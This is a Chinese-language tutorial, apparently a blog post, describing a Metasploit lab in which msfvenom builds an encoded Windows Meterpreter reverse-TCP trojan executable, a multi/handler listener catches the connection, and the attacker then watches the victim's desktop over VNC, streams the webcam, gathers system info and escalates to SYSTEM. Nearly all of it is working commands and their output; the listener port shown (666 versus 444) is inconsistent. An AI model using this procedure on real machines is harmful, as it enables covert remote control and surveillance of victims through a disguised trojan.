Meterpreter payload攻擊載荷，反彈實驗

製作木馬

攻擊載荷的概念類似反彈shell，使用

msfvenom -v

可以查看操作幫助

msfvenom -l

可以查看當前可以使用的攻擊載荷列表

生成一個反彈木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.136.131 lport=666 -f exe -e x86/shikata_ga_nai -i 8 -o muma2.exe -p windows/meterpreter/reverse_tcp使用反彈模式 lhost=192.168.136.131我的IP lport=666我要監聽的埠 -f exe生成exe文件 -e x86/shikata_ga_nai編碼混淆方式 -i 8編碼混淆次數 -o muma.exe生成的文件

當然，簡單的編碼混淆是過不了殺毒軟體的。

本地監聽

進入監聽模式

msf > use exploit/multi/handler

監聽的payload類型

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

監聽的IP

msf exploit(multi/handler) > set lhost 192.168.136.131lhost => 192.168.136.131

監聽的埠

msf exploit(multi/handler) > set lport 666lport => 444

開始監聽

msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.136.131:444 [*] Sending stage (179779 bytes) to 192.168.136.133

主機上線

[*] Meterpreter session 1 opened (192.168.136.131:444 -> 192.168.136.133:1027) at 2018-05-05 20:10:43 +0800

VNC桌面實時監控

meterpreter > run vnc Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "www-a8d99aa2ea1"

查看在線的攝像頭

meterpreter > webcam_list 1:

實時監控攝像頭

meterpreter > webcam_stream [*] Starting...[*] Preparing player...[*] Opening player at: ebSRJuzI.html

查看系統信息

meterpreter > sysinfo Computer : WWW-A8D99AA2EA1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2Meterpreter : x86/windows

查看當前許可權

meterpreter > getuid Server username: WWW-A8D99AA2EA1Administrator

許可權提升

meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITYSYSTEM

完畢

以上就是Meterpreter(MSF)payload攻擊載荷的簡單反彈實驗，msf作為大型攻擊框架，實際上可以攻擊安卓、web系統、linux等等，幫助文檔也比較詳細，英文基礎好上手毫無壓力。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！